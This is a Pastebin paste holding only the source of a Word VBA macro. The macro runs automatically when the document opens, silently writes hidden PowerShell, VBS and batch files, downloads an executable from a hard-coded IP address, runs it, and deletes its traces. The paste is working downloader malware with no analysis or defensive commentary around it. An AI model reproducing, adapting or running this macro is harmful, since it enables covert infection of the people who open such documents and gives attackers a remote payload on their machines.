Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Attribute VB_Name = "ThisDocument"
- Attribute VB_Base = "1Normal.ThisDocument"
- Attribute VB_GlobalNameSpace = False
- Attribute VB_Creatable = False
- Attribute VB_PredeclaredId = True
- Attribute VB_Exposed = True
- Attribute VB_TemplateDerived = True
- Attribute VB_Customizable = True
- Sub Auto_Open()
- h
- End Sub
- Sub h()
- Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR
- MY_FILEN = "ntusersc.ps1"
- MY_FILE = "ntusersss.bat"
- MY_FIL = "ntuserskk.vbs"
- MY_FILENDIR = ActiveDocument.Path + "\ntusersc.ps1"
- MY_FILEDIR = ActiveDocument.Path + "\ntusersss.bat"
- MY_FILDIR = ActiveDocument.Path + "\ntuserskk.vbs"
- Dim FileNumber As Integer
- Dim FileNumb As Integer
- Dim FileNu As Integer
- Dim retVal As Variant
- FileNumber = FreeFile
- FileNumb = FreeFile
- FileNu = FreeFile
- Open MY_FILENDIR For Output As #FileNumber
- Print #FileNumber, "$hashroot = '13-93-8e-e9-b1-a3-63-63-ed-49-7f-43-3d-5c-a2-c2';"
- Print #FileNumber, "$hash = '0';"
- Print #FileNumber, "$down = New-Object System.Net.WebClient;"
- Print #FileNumber, "$url = 'http://162.243.234.167:8080/gr/4.exe';"
- Print #FileNumber, "$file = 'crsss2.exe';"
- Print #FileNumber, "$down.DownloadFile($url,$file);"
- Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
- Print #FileNumber, "$someFilePath = $ScriptDir + 'crsss2.exe';"
- Print #FileNumber, "$vbsFilePath = $ScriptDir + 'ntuserskk.vbs';"
- Print #FileNumber, "$batFilePath = $ScriptDir + 'ntusersss.bat';"
- Print #FileNumber, "$psFilePath = $ScriptDir + 'ntusersc.ps1';"
- Print #FileNumber, "Do { Start-Sleep -s 10;"
- Print #FileNumber, "$md5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;"
- Print #FileNumber, "$hash = [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($someFilePath))); }"
- Print #FileNumber, "Until ($hash -Match $hashroot);"
- Print #FileNumber, "cmd.exe /c crsss2.exe;"
- Print #FileNumber, "$file1 = gci $vbsFilePath -Force"
- Print #FileNumber, "$file2 = gci $batFilePath -Force"
- Print #FileNumber, "$file3 = gci $psFilePath -Force"
- Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden"
- Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden"
- Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden"
- Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
- Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
- Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
- Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
- Close #FileNumber
- Open MY_FILDIR For Output As #FileNumb
- Print #FileNumb, "currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
- Print #FileNumb, "Set objFSO=CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
- Print #FileNumb, "currentFile = currentDirectory & " & Chr(34) & "ntusersc.ps1" & Chr(34)
- Print #FileNumb, "Set objShell = CreateObject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"
- Print #FileNumb, "objShell.run " & Chr(34) & "powershell.exe -ExecutionPolicy bypass -noprofile -file " & Chr(34) & " & currentFile,0,true"
- Close #FileNumb
- 'creat batch file
- Open MY_FILEDIR For Output As #FileNu
- Print #FileNu, "@echo off"
- Print #FileNu, "ping 1.1.2.2 -n 2"
- Print #FileNu, "cscript.exe " & ActiveDocument.Path & "\ntuserskk.vbs"
- Print #FileNu, "exit"
- Close #FileNu
- dir1 = Len(Dir(MY_FILENDIR))
- dir2 = Len(Dir(MY_FILEDIR))
- dir3 = Len(Dir(MY_FILDIR))
- SetAttr MY_FILENDIR, vbHidden
- SetAttr MY_FILEDIR, vbHidden
- SetAttr MY_FILDIR, vbHidden
- Do While dir1 = 0
- WaitFor (2)
- Loop
- Do While dir2 = 0
- WaitFor (2)
- Loop
- Do While dir3 = 0
- WaitFor (2)
- Loop
- 'Shell "cmd.exe /k " + MY_FILEDIR
- retVal = Shell(MY_FILEDIR, 0)
- End Sub
- Sub WaitFor(NumOfSeconds As Long)
- Dim SngSec As Long
- SngSec = Timer + NumOfSeconds
- Do While Timer < SngSec
- DoEvents
- Loop
- End Sub
- Sub AutoOpen()
- Auto_Open
- End Sub
- Sub Workbook_Open()
- Auto_Open
- End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement